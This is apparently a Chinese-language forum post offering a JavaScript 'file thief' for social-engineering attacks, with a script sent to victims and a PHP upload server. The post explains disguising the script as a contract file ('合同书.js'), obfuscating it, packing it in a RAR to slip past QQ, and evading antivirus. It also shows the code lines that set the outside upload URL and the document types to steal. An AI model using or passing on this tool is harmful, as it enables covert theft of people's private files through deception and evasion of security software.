js文件小偷
主要用在交互式社工时,需要得到被社目标电脑上的一些文件时。分客户端和服务端两份。
是js文件,不是exe。(过360全套无提示)
自动搜索目标电脑上指定的扩展名的文件,上传到服务器。
(默认是doc和xls之类的,需要什么文件可以自行修改,一共也没几行代码)
优点是个头小,而且不是exe文件,现在exe文件太敏感,还有在全过程360没有提示。(金山猎豹会提示在上传文件)
修改过脚本后自己用js加密工具加密一下隐密性还凑合,容易获得信任,js在不懂的人眼里是不知道是什么,半懂不懂的人认为是无害的,图标又长的像文本文件,起个“合同书.js”发过去,我发现成功率很高,比直接发EXE靠谱的多。
缺点嘛,通过QQ传送依然会被重命名,要把js后缀的重命名去掉,所以推荐用rar压缩包发送,js不是常见扩展名,还有就是功能简陋,就这一个功能,哪位大牛修改了弄的更好了希望能共享一下。
用法很简单了,把server.php放到网上,建立个uploads目录,发js文件给别人,然后等会儿去uploads目录看。(具体看代码吧,很简单的。)
server.php放在服务器web目录
这里可以修改文件存放目录
scan.js发给被攻击者
var POSTURL = 'http://www.baidu.com/server.php';`### js第一行的这段代码里面修改你web域名或者ip都行
if (/.(doc|docx|xls|xlsx)$/i.test(FileList)) {`## js地54行这里是可以修改长传文件后缀名的 txt什么的都行